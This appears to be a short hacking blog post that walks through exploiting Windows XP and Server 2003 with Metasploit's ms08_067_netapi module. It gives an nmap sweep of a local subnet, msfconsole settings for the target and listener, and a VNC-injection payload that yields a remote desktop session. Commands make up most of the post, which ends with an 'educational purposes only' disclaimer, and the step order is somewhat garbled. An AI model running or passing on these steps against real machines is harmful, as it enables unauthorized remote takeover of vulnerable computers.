Every mey have probably heard of the metasploit framework. metasploit was originally written in perl , but later it was re-written in ruby.its basically a large database of exploit code , scanners , encoders and payloads ... target :windows XP sp2 ( this exxploit also works with windows sever
2003 and windows xp sp3)
exploit:ms08_067_netapi
my OS :backtrack 5R2
so this is what msfconsole looks like -->
i recommend using metasploit on linux or atleast a linux virtual machine, the windows version isnt that powerfull
so after firing up metasploit this is what we do
CODE :
nmap -sS -Pn -A 192.168.1.1/24
assuming your local address is the one i used , this command is used for "port-scanning" your local area network to find live hosts , and report the number of open ports and the services (DAEMONS) running on them
after finding a XPsp2 / sp3 /windows server 2003 system ... -->
CODE :
set RHOST (local ip of remote host)
CODE :
set LHOST 192.168.1.1
CODE :
set THREADS 100
CODE :
use windows/smb/ms08_067_netapi
at this point you should get something like this
msf exploit(ms08_067_netapi) >
use the -show payloads- command to get a list of suitable payloads
im going to use a relective VNC injection
CODE :
set PAYLOAD windows/vncinject/bind_tcp
all set now
type in exploit
and if the exploit succeeds
you will get a vnc session
now THE ABOVE MENTIONED ARTICLES ARE ONLY FOR EDUCATIONAL PURPOSES
AND POST YOUR COMMENTS KINDLY
No comments:
Post a Comment